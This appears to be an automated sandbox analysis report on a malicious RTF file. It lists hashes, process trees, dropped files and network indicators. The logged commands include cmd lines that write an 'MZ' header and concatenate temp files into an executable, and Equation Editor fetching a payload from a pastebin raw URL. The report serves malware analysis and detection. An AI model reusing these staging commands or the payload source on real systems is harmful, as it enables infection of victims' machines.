File name: | 722be87f72a8e18c0b7f50cdac7e118f64364f519cf59d0b4e0f4798029847d8.doc |
Full analysis: | https://app.any.run/tasks/b9f330f3-08a7-42f1-9d18-7383afc95df5 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 02:27:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | D717F8EA3DEAFE654A2FA340CAA1087E |
SHA1: | BED1B7A3D24CAB33FD190E20E82EF6BF04E433D4 |
SHA256: | 722BE87F72A8E18C0B7F50CDAC7E118F64364F519CF59D0B4E0F4798029847D8 |
SSDEEP: | 12288:ShBwv6ofE+pmR2m2Mm3veYRNc8tIABhXBg92g5p1m2pAXbJT/4qTurpbjcL2GbGs:NcqtuV57zp6SbjcL2GbkDfOp |
.rtf | | | Rich Text Format (100) |
---|
Author: | n3o |
---|---|
LastModifiedBy: | n3o |
CreateDate: | 2019:03:12 13:30:00 |
ModifyDate: | 2019:03:12 13:33:00 |
RevisionNumber: | 1 |
TotalEditTime: | 3 minutes |
Pages: | 1 |
Words: | 3 |
Characters: | 18 |
CharactersWithSpaces: | 20 |
InternalVersionNumber: | 99 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1928 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\722be87f72a8e18c0b7f50cdac7e118f64364f519cf59d0b4e0f4798029847d8.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2668 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3004 | cmd /c echo|set /p "=MZ">%temp%\~F9.TMP | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2108 | C:\Windows\system32\cmd.exe /S /D /c" echo" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1952 | C:\Windows\system32\cmd.exe /S /D /c" set /p "=MZ" 1>C:\Users\admin\AppData\Local\Temp\~F9.TMP" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
400 | "C:\Windows\System32\cmd.exe" /c ping localhost -n 2 | C:\Windows\System32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2860 | ping localhost -n 2 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1916 | cmd /c copy /B %temp%\~F9.tmp+%temp%\~191AEF9.tmp %temp%\~AFER125419.tmp | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1620 | "C:\Windows\System32\cmd.exe" /c ping localhost -n 2 | C:\Windows\System32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2960 | ping localhost -n 2 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8DDF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3320 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsA668.tmp | — | |
MD5:— | SHA256:— | |||
3320 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsA679.tmp | — | |
MD5:— | SHA256:— | |||
1928 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A3D37A96BE99E1B37F142EAB31105E77 | SHA256:10776DED098C89C43628A733533878C3854AA3666210F1501E5D0D74311EF8F0 | |||
2668 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\9t3R1Ng5[1].txt | html | |
MD5:46E774A64A0BABA116BED7A62E77560B | SHA256:9BC2E775F418BF2F0D9D1CBE2E44CCB048291BC96B70AA089C9ABB4E46C850C4 | |||
1928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CEE49C8.emf | emf | |
MD5:39BE498AD2A2E6E0E23F2844100DBA0B | SHA256:1E10939E7E60AEF49FBCA8B0052993A6D94C835938C789FB3C7AF24FF0EF1777 | |||
2668 | EQNEDT32.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | |
MD5:86A254EA9293432D8DDF5807AAADF38A | SHA256:B784CCF29BC2AC794502D2FC182F594912EC6EC02E939ECD872966BB0172AEF0 | |||
1928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$2be87f72a8e18c0b7f50cdac7e118f64364f519cf59d0b4e0f4798029847d8.doc | pgc | |
MD5:B1EA0F9AA82CCF9C26D53068434DAB52 | SHA256:31EDCCA194CFF2CAFD30F3F76ADC4C7089A68874BC09BF3CC963C7D16891026B | |||
1916 | cmd.exe | C:\Users\admin\AppData\Local\Temp\~AFER125419.tmp | text | |
MD5:AC6AD5D9B99757C3A878F2D275ACE198 | SHA256:9B8DB510EF42B8ED54A3712636FDA55A4F8CFCD5493E20B74AB00CD4F3979F2D | |||
1952 | cmd.exe | C:\Users\admin\AppData\Local\Temp\~F9.TMP | text | |
MD5:AC6AD5D9B99757C3A878F2D275ACE198 | SHA256:9B8DB510EF42B8ED54A3712636FDA55A4F8CFCD5493E20B74AB00CD4F3979F2D |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2668 | EQNEDT32.EXE | GET | 200 | 104.20.208.21:80 | http://pastebin.com/raw/9t3R1Ng5 | US | html | 574 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2668 | EQNEDT32.EXE | 104.20.208.21:80 | pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2668 | EQNEDT32.EXE | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |